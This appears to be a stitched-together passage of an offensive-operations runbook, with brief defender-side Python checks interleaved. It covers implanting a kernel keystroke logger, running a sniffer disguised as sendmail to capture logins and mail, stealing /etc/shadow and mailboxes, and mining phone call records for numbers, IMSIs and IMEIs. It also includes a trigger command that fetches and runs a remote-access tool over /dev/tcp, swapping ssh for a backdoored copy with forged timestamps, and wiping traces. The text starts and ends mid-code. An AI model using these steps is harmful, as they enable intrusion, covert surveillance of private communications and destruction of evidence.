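            findings.append(("time goes backwards", b["index"]))
    return findings


if __name__ == "__main__":
    print(audit(parse_wtmp(SAMPLE_WTMP)))                       # []
    print(audit(parse_wtmp(zero_record(SAMPLE_WTMP, 2))))       # bob zeroed, logout orphaned
    print(audit(parse_wtmp(splice_out(SAMPLE_WTMP, {2, 3}))))  # []: nothing left in-file
```

The third case is the reason the runbook does not stop at wtmp: a spliced wtmp is self-consistent, so the record of that session now lives only in lastlog, sulog, messages and the accounting file, which is exactly the list of things the toast, sgrep and pclean sections go on to edit.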
######################################################################################
### check logs
#grep 217.53.1.2 /var/adm/SYSLOG /var/log/syslog
grep PITCH_IP /var/adm/SYSLOG /var/log/syslog /var/adm/messages
### Get a reboot history through a combination of the following:
### Take note if anyone was on the console around the time of any reboots
last | egrep "down|boot|console"
last -15 boot
-tail /var/adm/sulog

#### CHECK FOR ACCOUNTING...
-ls /var/adm/*acct
-ls -t /var/spool/cron/crontabs
grep acct /var/spool/cron/crontabs/*
-ls /var/spool/cron/atjobs
grep acct /var/spool/cron/atjobs/*

#### (1) What's the current local time?
### (2) Is the platform close to what we thought?
### (3) Do we have some available disk space?
### (4) Are there currently any at jobs?
date; uname -a; df -k; at -l

### check for remote monitoring
#-ls -t /var/adm/syslog.dated
#-ls -t /var/adm/syslog.dated/current/
#-tail -70 /var/adm/syslog.dated/current/auth.log
#-tail -70 /var/adm/syslog.dated/current/daemon.log
#-tail -70 /var/adm/syslog.dated/current/mail.log
#-tail -70 /var/adm/syslog.dated/current/others.log
#egrep "PITCH_IP|inetd| ident" /var/adm/syslog.dated/current/*.log
### check other logs
-ls -t /var/adm
-ls -t /var/log

####### LINUX VALIDATOR TECH CHECKS:
hostname
=mkoffset
-ifconfig
### Looking for libinit.so in maps:
-ls /proc/1/
cat /proc/1/maps
### check access times:
-lt /lib/libinit.so
-ls -u /lib/libinit.so
### should NOT exist:
-lt /etc/ld.so.preload
### see if lock file is there, pull if not too big:
-lt /var/spool/lpd/_default
-get /var/spool/lpd/_default/
### check reboots:
-ls -t /var/log/*ksym*
### check logs around time of last callback:
-ls -t /var/log/mess*
-get /var/log/mess*
### pull this (should compress well):
-lt /var/log/lastlog
-get /var/log/lastlog
-ls -t /root
-get -v /root/.bash_history

############# For LINUX
-ls /var/spool/cron
-ls /var/run/utmp
-ls /var/log/wtmp
netstat -an
netstat -anlp
###### shows dates of reboots:
-lt /var/log/ksyms*
### Like uname -a
-cat /etc/*release
uname -a
### Like psrinfo -v:
cat /proc/cpuinfo
# Kernel info - vmlinux
stat /dev
stat /sbin/init
-lt /boot
-get /boot/System.map*
-lt /etc
-get /etc/lilo.conf
mount
-ls /sbin/init
cksum /sbin/init
lsmod
-ls /sbin
ls -l /proc/1/exe
-ifconfig
netstat -npa
# For SS
/proc/config.gz
/boot/config-`uname -r`
/proc/version
/usr/src/linux-`uname -r`/.config
/usr/src/linux-`uname -r`/configs/*.config
# For JL
rpm -qa |grep xinet
-strings /usr/sbin/xinetd |grep Version
-get /usr/sbin/xinetd
-ls /etc/xinetd.conf
grep "disable" /etc/xinetd.d/*
chkconfig --list
######## END FORENSICS ##########################

############- Create our slash and burn at job
cd /; echo "rm -rf /tmp/.scsi > /dev/null 2>&1" | at now + 180 minutes
cd /; echo "kill -9 ###FINSPID### > /dev/null 2>&1" | at now + 180 minutes
at -l; date
### vi commands to (1) mark, (2) modify file for at job, (3) jump back here
mx
:%s/at -r ### /at -r /g
`x
### redo path with WORKINGDIR
-setenv PATH=/tmp/.scsi:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb

### What protocols are serviced by 'inetd'...
grep -v "^#" /etc/inetd.conf
### Which facilities and levels are getting logged to which files/hosts...
grep -v "^#" /etc/syslog.conf
### Named config files
-ls /etc/named*
-ls /var/named*

### ASET (Automated Security Enhancement Tool) CHECK...
###
### After connecting and creating/cd-ing to your "working
### directory" in /tmp
grep aset /var/spool/cron/crontabs/*
### if aset is running, look for the path after the "-d" option
### i.e. 0 0 * * * /usr/aset/aset -d /usr/aset
### /usr/aset would be the path we're looking for
### if this path is _not_ /usr/aset, run the following commands
### as is AND a second time replacing /usr/aset with the path
### from the cron job
#ls -al /usr/aset
#ls -al /usr/aset/reports/latest
### ASET Tasks...
#ls -al /usr/aset/tasks
#tar cvf as.t /usr/aset/tasks; ls -la
#### ASET Archives...
#ls -al /usr/aset/archives
#tar cvf as.a /usr/aset/archives; ls -la
#### ASET Master Files...
#ls -al /usr/aset/masters
#tar cvf as.m /usr/aset/masters; ls -la
#### Download any ASET tar files and remove from tmp dir on target

################ Locally, look thru find ################################
#### Typical grep's on downloaded 'find' file
#### Do on local host after downloading files. Collectively...
cd /current
egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' *m
## or, singly...
grep cgi-bin *m
grep tftpboot *m
grep cisco *m
grep router *m
grep hack *m
grep "\.\.\." *m
grep ssh *m
grep tac *m |egrep '(passwd|pwfile|etc|wtmp|conf|plus)'
#### Since we're looking at 'find', TRIPWIRE could be elsewhere, too...
#### Collectively...
egrep '(trip|twz|tw\.config)' *m
# or, singly...
grep trip *m
grep twz *m
grep "tw\.config" *m
### look for history files
grep history *m
### Extra -local window
#lsstamp -c 2 -s    sorts based on atime (good for finding config files)
#lsstamp -c 3 -s    sorts based on ctime (good for finding hacker activity)
# OR
# ./mkfinds -h
# ./mkfinds

###################################################################################
###################################################################################
### PASSWD FILE?
# get -l option will drop the absolute path locally
-ls /etc/passwd /etc/shadow
-get -l /etc/passwd /etc/shadow

############# MAILGRAB ##############################
# Strifeworld Collection
-setenv PATH=/tmp/.scsi:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
who -b

######################################################
# SUCTIONCHAR
######################################################
# 32 or 64 bit OS - solaris sparc 8,9
# Kernel level implant - transparent, sustained, or realtime
# interception of process input/output vnode traffic.
# retrieve later
# filter: ssh, telnet, rlogin, rsh, password, login, csh, su
# max bytes collected per session is 32 kilobytes
# max bytes collected for all sessions is 1 megabyte
# don't take up more than 1% of system's memory
# to determine if suctionchar is loaded on a system, open a command
# channel to the implant as described in the authenticate and yyserv
# tool and demo sections. If this fails and you get the error
# "Bad Address" when trying to modload the instant grat module
# (function call needing patch can't be found), it has probably
# already been patched by a version of suctionchar already running
# SUCTIONCHAR will go away at reboot
# if offset involved with target, must set op box time to match target time

# INSTALLING SUCTIONCHAR
uname -a
isainfo -v
-cd /tmp/.scsi
cp /usr/sbin/modload ml
cp /usr/sbin/modinfo mi
### if running 32 AND 64 bit, upload 64 bit:
# 64 bit
-put /current/up/sparcv9/sum sum
# else 32 bit
-put /current/up/sum sum
-lt sum
### install it:
./ml sum
### make sure sum doesn't show up in modinfo:
./mi
### note size of sum for dd command:
-lt sum
### Run dd to zero out 'sum' binary so its contents can't be recovered from disk after deletion
#
# say size of sum is 34364, need for count in dd
#
dd bs=1 count=34364 if=/dev/zero of=sum
-rm sum ml mi
### nothing should have logged:
-tail /var/adm/messages

##### NOPEN SUCTIONCHAR COMMANDS ########
[-suc]
Usage: -suc [get|] | [-s] [..] | blow | info | filter | free | unhook
-suc info            # shows if installed and bytes collected, max s and max c
-suc filter          # set filters
/current/etc/suctionchar.sample.conf
# locally to give pastable for -suc filter:
# make filter.conf file
/current/bin/suctionchar.genconf /current/etc/suctionchar.sample.filter.conf
# paste filter in one at a time from genconf bottom output until all filters
# in; filter saved message appears
-suc get             # get data, decrypt, view
-suc blow            # remove suctionchar
-suc -s pid [pid]    # on the fly tracking of process to screen
-suc free            # free memory of suctionchar data
-suc unhook          # unhook any realtime process with -s to screen

# on target: to authenticate must run yyserv on target and
# /current/etc/suctionchar.authenticate locally
# authenticate by hand, our opbox time must be set exactly to authenticate
cp /bin/cat yyserv
-shell
echo $$        # notice pid
./yyserv
# to exit
# 1 -- copy magic string from local authenticate window
# 3 -- copy first response from local authenticate window
# 5 -- copy second response from local authenticate window
info
OK
info
exit

# locally
cd /current/bin
./suctionchar.authenticate
# 2 -- place PID from echo $$ on target (-shell)
# 4 -- challenge= copy from yyserv output string in between first response string

# yyserv commands
# info - stats on collected sessions
info
# filt - reprogramming the filter rules it is running; intended to only be
#        used with commands generated by genconf
filter
# copy filters one by one based on local genconf output
# file - writes out collected data to disk; file name in double quotes
#        ex: "/tmp/filename"; should receive ERROR if wrong, WROTE to "/tmp/filename"
file "/tmp/.scsi/d
# in nopen window not running yyserv
-get /tmp/.scsi/d
-rm /tmp/.scsi/d
# locally
/current/etc/suctionchar.decrypt PATH/d outfile
# free - deallocates memory to store collected data; should always get OK
free
# hook - realtime snooping of existing processes
#        ex: hook PID
# unho - unhooking any realtime hooked processes
# sets - set maximum bytes collected per session (MAX S =)
# setc - set maximum total bytes, across all collected sessions, used to
#        store data in memory (MAX C =)
# unpa - unpatch itself from the kernel
# exit - send kill to yyserv
# when finished using yyserv manually, make sure cleaned up properly
ps -ef | grep yyserv
-lt
-rm yyserv
-cd /tmp
-rm /tmp/.scsi

######################################################
# STRIFEWORLD
######################################################
###
### IMPORTANT: make note of PID,PPID that strifeworld reports when you start it and save it in opnotes
###
### man page:
cd /current/etc
nroff -man strifeworld.1

############ Start STRIFEWORLD #####################
### upload strifeworld as sendmail (or something else that might blend in)
-put /current/up/strifeworld sendmail
### Sniffing syntax:
#PATH=. E="port 23 and host (210.56.16.1 or 210.56.4.1)" C="-o/tmp/.nfs7254 -n. -ihme0 -a3000 -b10000 -x100" sendmail
#PATH=. E="port 23" C="-o/tmp/.nfs7254 -n. -ihme0 -a3000 -b10000 -x100" sendmail
### Task mail:
#PATH=. E="port 25" C="-o/tmp/DIR -f(user1 user2) -ihme0 -a3000 -b100000 -j10000000" sendmail
#PATH=. E="port 25" C="-o/tmp/DIR -f([^a-zA-Z0-9_-](user1|user2|user3)@) -ihme0 -a3000 -b100000 -j10000000" sendmail
#PATH=. E="port 25" C="-o/platform/SUNW,SystemEngine/kernel/drv/scsi -f([^a-zA-Z0-9_-](user1|user2|user3)@) -ihme0 -a3000 -b100000 -j10000000 -x100 -l" sendmail
### Dump to hidden directory:
### to hide on a sparc system
-lt /platform/SUNW,SystemEngine/kernel/drv
PATH=. E="port 23" C="-m -o/platform/SUNW,SystemEngine/kernel/drv/.scsi -n. -i iprb0 -a3000 -b10000 -x100 -l" sendmail
### to hide file on an x86 system
-lt /platform/dvri86pc/kernel/drv
PATH=. E="port 23" C="-m -o/platform/dvri86pc/kernel/drv/.scsi -n. -i iprb0 -a3000 -b10000 -x100 -l" sendmail
### make note of PID,PPID it echoes back and document the command used to start it
### verify it's running and hidden:
ps -ef | grep PID
cd /dev; ps -ef |grep " sendmail"
# or
echo "p\nq\n"|crash|grep sendmail    # Should see sendmail with .
echo "p\nq\n"|crash|grep PID         # Should see sendmail with .

############ Dump STRIFEWORLD #####################
### first, change local dir to either mailpull or sniffer:
-lcd /current/down/sniffer/TARGET_NAME.TARGET_IP
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
### dump via built-in:
=swkill
### dump by hand:
### figure out sw PID and replace it in line below:
#A=PID export A; kill -USR1 $A; sleep 1;kill -USR2 $A;sleep 1; kill -USR1 $A;sleep 1;kill -USR2 $A
-ls -t /tmp
-get -l /tmp/file1 /tmp/file2
-rm /tmp/file1 /tmp/file2
-ls -t /tmp
### or if in a hidden directory (filename usually 'scsi'):
-ls /platform/SUNW,SystemEngine/kernel/drv/scsi
-ls /platform/dvri86pc/kernel/drv/scsi
-get -l FILENAME
cat /dev/null > FILENAME
-lt /platform/SUNW,SystemEngine/kernel/drv
-lt /platform/dvri86pc/kernel/drv

######### To grep headers from strifeworld mail collection: ##############
wc -l /tmp/file1 /tmp/file2
### P2 below is four "digits." groups plus a port, i.e. an A.B.C.D.PORT endpoint,
### and "$P2-$P2" matches the src-dst session markers in the collection file.
### ([12]?[0-5]?[0-9]+ matches any run of digits, not a strict octet; it is loose on purpose.)
### while on target:
#P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|^To:|^From:|^Subject:|filename=)" /tmp/.nfs6218
### when done locally:
#P0=[12]?[0-5]?[0-9]+\\. ; P1=[0-9]+ ; P2=$P0$P0$P0$P0$P1 ; egrep -ni "($P2-$P2|^To:|^From:|^Subject:|filename=)" /current/down/mailpull/TARGET_NAME.TARGET_IP

############# MAILGRAB ##############################
### Multiple mail pulls
-lcd /current/down/mailpull/TARGET_NAME.TARGET_IP
##### or use -chili
# -chili -s 1 -l mm-dd-yyyy /var/mail USER1
## after down, check size locally
cd /current/down/mailpull/TARGET_NAME.TARGET_IP
# look at SA mail
-tail /var/adm/sulog
-ls /var/mail/USER
grep -n -i "^Subject: " /var/mail/USER
### Generic stuff
### SUBJECT/DATE/FROM/TO/E-MAIL ATTACHMENTS Normal...
#cd /var/mail; egrep '(^Subject:|^Date:|^From:|^To:|name=)' *

############### Get ready to cleanup ###################################
### redo path with WORKINGDIR
-setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb

############- ZAP OUR AT JOB
at -l
at -r ### ; at -l

############ HEALTH CHECK #########################
### Run the following before pcleaning to baseline system health prior
### to end of op
w; date; last -80
/sbin/ps -elf; swap -l; uptime
ps -ef |grep " sendmail"
-pid
df -k
-ls -t /
-tail -50 /var/adm/messages
-ls -t /var/log /var/cron /var/adm

####
### Clean up and Bail
####
### Remove working dir, reset timestamp, rm touchfile, verify /usr and /tmp
### then
-cd /tmp
-rm /tmp/WORK_DIR YES
-ls /tmp
####
## Kill off all remote nopen server processes...
####
-burn BURN
#### Try reconnecting to make sure noserver died
###### End of user.mission; You're done!!!! ########################

###
### END USER.MISSION File user.mission.generic.COMMON
### (see also ../etc/user.mission.generic.COMMON)
###

### BEGIN File user.tool.pork.COMMON (see also ../etc/user.tool.pork.COMMON)
###
##### Triggering PORK #####
### Need 4 scripted windows
### Window 1: local, run pork client
### Window 2: nopen tunnel window on redirector
### Window 3: window to establish Nopen connection on redirector
### Window 4: packrat window
### Search/Replace stuff
### TARG_IP: box that has pork installed
### TARG_PORT: pork'ed port
### REDIR_IP: box hitting TARG_IP
### NETCAT_PORT: port to upload nopen
### NOPEN_PORT: port to start nopen on
### SPECIAL_SOURCE_PORT: source port of connection to pork
###   (source port must be one of: 3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)
### TEMP_DIR: temp directory
### TIME_ADJ: time diff between local GMT and targ GMT (use 0 if no diff)
###   (must be within 12 hrs)
mx
:%s/TARG_IP/TARG_IP/g
:%s/TARG_PORT/TARG_PORT/g
:%s/REDIR_IP/REDIR_IP/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/NOPEN_PORT/NOPEN_PORT/g
:%s/SPECIAL_SOURCE_PORT/SPECIAL_SOURCE_PORT/g
:%s/TEMP_DIR/TEMP_DIR/g
:%s/RAT_REMOTE_NAME/RAT_REMOTE_NAME/g
:%s/TIME_ADJ/TIME_ADJ/g
'x

### Window 2: Set up tunnel to talk to pork
-tunnel
r NETCAT_PORT
# If pork'ed service is TCP
l TARG_PORT TARG_IP TARG_PORT SPECIAL_SOURCE_PORT
# If pork'ed service is UDP
u TARG_PORT TARG_IP TARG_PORT SPECIAL_SOURCE_PORT

### Window 3: If need nopen to call back, set this up
-nrtun NOPEN_PORT

### Window 4: use packrat to prep Nopen
### Change the Nopen to upload if necessary
cd /current/up
packrat -z RAT_REMOTE_NAME morerats/noserver-3.0.3.1-i586-pc-linux-gnu NETCAT_PORT

### Window 1: Trigger pork
### Many ways this command may need to be adjusted to do callback, execute rat,
### etc., so all possibilities not outlined below
### NOTE: REDIR_PORT in the trigger string is not in the search/replace list above,
### so it is not filled in by the vi commands; it is the port the target reaches the
### packrat listener on through the window-2 reverse tunnel (NETCAT_PORT). Set it by hand.
cd /current/bin
# If TCP
./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uudecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOPEN_PORT RAT_REMOTE_NAME"
# If UDP
./client -u TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT "cd /tmp; mkd TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/REDIR_PORT > RAT_REMOTE_NAME.uu; uudecode RAT_REMOTE_NAME.uu; chmod 700 RAT_REMOTE_NAME; PATH=. S=1 D=-cREDIR_IP:NOPEN_PORT RAT_REMOTE_NAME"

### Window 3: Should see Nopen connection if set up to callback
### If set up to listen, use this line
-nstun TARG_IP NOPEN_PORT
### Should be able to handle it from here...
###
### END File user.tool.pork.COMMON
### (see also ../etc/user.tool.pork.COMMON)
###

### BEGIN File user.tool.cursehydrant.COMMON (see also ../etc/user.tool.cursehydrant.COMMON)
###
################ CURSEHYDRANT #########################
############### PARSING ###################################################################
### vi Search/Replace commands
###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehydrant.DDMonYY

####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:
### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the empty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate line
# make sure there are NO EMPTY LINES!!!!
# Format of each type of argument:
# p123456789 - phone number
# s123456789 - IMSI
# e123456789 - IMEI
# c123/456 - Cell/LAC (no leading 0's)
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt

########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage; Once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the cursehydrant commands.
### Typical file locations per host:
### Just check to see if files have been removed
-lt /root
-vget /root/.sh_history

########################## liquidsteel:
### fc: 192.168.100.10
ls /share/a1338/ne_q3ic/nb/convert/output | wc -l
ls /share/a1338/ne_q3ic/nb/convert/output | head -10
ls /share/a1338/ne_q3ic/nb/convert/output | tail -10
-ls /share/a1338/ne_q3ic/nb/convert/output/*dF*

########################## sicklestar:
### about two weeks worth are kept in this directory:
### CDRCOL1: 10.211.4.1
### CDRCOL2: (if not on CDRCOL1) 10.211.4.2
ls /share/a1338/ne_q3ic/nb/convert/output | wc -l
ls /share/a1338/ne_q3ic/nb/convert/output | head -10
ls /share/a1338/ne_q3ic/nb/convert/output | tail -10
-ls /share/a1338/ne_q3ic/nb/convert/output/*dF*
### this is where they are backed up - this could be huge
ls /share/a1338/ne_q3ic/nb/convert/backup | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup | tail -10
ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/TODO | tail -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad1 | head -10
ls /share/a1338/ne_q3ic/nb/convert/backup/ahmad/sulaman | wc -l

########################## CURSEHYDRANT ######################################################
###############################################################################################
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### to encrypt all at the same time (glob on *.txt so a re-run does not
### pick up the .enc files already written and produce argfile1.enc.enc):
for i in argfile*.txt ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc

### Tips for running the CURSEHYDRANT 4.2.1
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional
### passes are needed for the date range
### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption)
### By default, the new CH expects a cryptokey:
### to run in the clear, take out the -k KEY, add -w, replace -P with -p
### The phone list is deleted automatically now
### Suggested -z options:
### this looks in subdirs, so use caution in backup dir (can be good AND bad):
### Also circumvents "parameter list too long" problem with wildcards with 'ls'
-z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -print"
### works, but only for smaller ranges (command line arglist gets long)
-z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*"
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
######## Upload the parser (CURSEHYDRANT) and call it lvmkd
# put up the parser tool
-put /current/up/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd
# or
-put /mnt/zip/cursehydrant.v4.2.1.HP-UXB.11.00.targetsl lvmkd
##### Upload the encrypted phone list as nfskd, then run the parser:
############ argfile 1
-put /current/down/argfiles/argfile1.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06071[3456]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06071[012]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[89]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[67]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile3.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[345]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc3
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc nfskd
export ENV_ARGS='-d -k CRYPTKEY -z "find /share/a1338/ne_q3ic/nb/convert/output -name '06070[012]*dF*' -print" -P ./nfskd'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc3.more
#-beep 15
######
###### to run parser in the clear (unencrypted):
######
#-put /current/down/argfiles/argfile1.txt nfskd
#export ENV_ARGS='-w -z "find /share/a1338/ne_q3ic/nb/convert/output -name '060501*dF*' -print" -p ./nfskd'; ./lvmkd >T:/current/down/cdrhits.test
#-beep 15
######
###### to completely parse a range of files (no encryption & no particular number to search):
######
#export ENV_ARGS='-o -w -d -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdr.morenumbers
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with them:
### to limit the amount of memory used, replace "-x" with "-X numberBytes"
export ENV_ARGS='-x -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit the amount of memory used, replace "-y" with "-Y numberBytes"
export ENV_ARGS='-y -k CRYPTKEY -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/06051[1-2]*dF*"'; ./lvmkd >T:/current/down/cdrhits.cursehydrant.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc1 -o cdrhits.cursehydrant.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehydrant.HOST.DDMonYY.enc2 -o cdrhits.cursehydrant.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)
cd /current/down
for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*
######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef |grep lvmkd
### if the parser command is still "running", then kill the process:
### kill -9
### You'll still be able to decrypt the partially completed data pull
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
####### HP-UX (DO NOT BURN! DO NOT BURN! DO NOT BURN!)
-gs wearcup
####### Everything else...
-rm lvmkd nfskd
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
##### Either -burn off or, if the target is HPUX, use -exit and let -wearcup do the cleanup
###
### END File user.tool.cursehydrant.COMMON
### (see also ../etc/user.tool.cursehydrant.COMMON)
###

### BEGIN File user.tool.dubmoat.COMMON (see also ../etc/user.tool.dubmoat.COMMON)
###
##########################################
# DUBMOAT
##########################################
### Verify version on target:
uname -a
which ssh
ssh -V
### Preserve timestamps:
-ls -i /usr/bin/ssh
-ls -d /usr/bin
touch -r /usr/bin/ssh /tmp/.st
touch -r /usr/bin /tmp/.sb
-lt
### Create location (utmp~) for dubmoat logging:
-ls -t /var/run
cp /var/run/utmp /var/run/utmp~
### fix permissions so any user can write to the file:
chmod 666 /var/run/utmp~
### Download original ssh:
-get /usr/bin/ssh
### Upload dubmoat and check the version:
-put /current/up/Ssh ssh
./ssh -V
### Cat our version over original to preserve inode:
cat /tmp/ssh > /usr/bin/ssh
-ls -i /usr/bin/ssh
/usr/bin/ssh -V
file /usr/bin/ssh
### Fix timestamps:
touch -r /var/run/utmp /var/run/utmp~
touch -r /var/run/utmp /var/run
touch -r /tmp/.st /usr/bin/ssh
touch -r /tmp/.sb /usr/bin
-ls -i /usr/bin/ssh
-ls -d /usr/bin/.
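A defender-side check for the artefacts the install steps above leave behind, added here as an example and not part of the original notes: the binary is overwritten through its existing inode and its mtime put back with touch -r, but ctime is set by the kernel and cannot be restored from userland, so a manifest that recorded hash, inode, mtime and ctime exposes the edit, and the 0666 utmp~ copy is the second tell. The temp-directory scenario it runs on is constructed; no real system files are touched.

```python
import hashlib
import os
import stat
import tempfile
import time


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline(paths):
    """Known-good manifest taken from a trusted state: path -> (sha256, inode, mtime_ns, ctime_ns)."""
    out = {}
    for p in paths:
        st = os.lstat(p)
        out[p] = (sha256_of(p), st.st_ino, st.st_mtime_ns, st.st_ctime_ns)
    return out


def scan(manifest, run_dirs):
    """Compare live files with the manifest and look for world-writable spool files."""
    findings = {"hash_mismatch": [], "inplace_edit_mtime_restored": [], "world_writable": []}
    for path, (good_hash, good_ino, good_mtime, good_ctime) in manifest.items():
        st = os.lstat(path)
        if sha256_of(path) != good_hash:
            findings["hash_mismatch"].append(path)
        # 'cat new > /usr/bin/ssh' keeps the inode and 'touch -r' puts the old mtime back,
        # but ctime moves on every inode change and cannot be set from userland:
        # same inode + same mtime + different ctime is the signature of that edit.
        if st.st_ino == good_ino and st.st_mtime_ns == good_mtime and st.st_ctime_ns != good_ctime:
            findings["inplace_edit_mtime_restored"].append(path)
    for d in run_dirs:
        for name in os.listdir(d):
            full = os.path.join(d, name)
            st = os.lstat(full)
            # a mode-666 copy of utmp sitting next to the real one is the logging drop
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                findings["world_writable"].append(full)
    return findings


def demo():
    """Constructed scenario in a temp dir: baseline, reproduce the artefacts, scan.
    Returns basenames per finding category so the result is path-independent."""
    with tempfile.TemporaryDirectory() as root:
        bindir, rundir = os.path.join(root, "bin"), os.path.join(root, "run")
        os.mkdir(bindir)
        os.mkdir(rundir)
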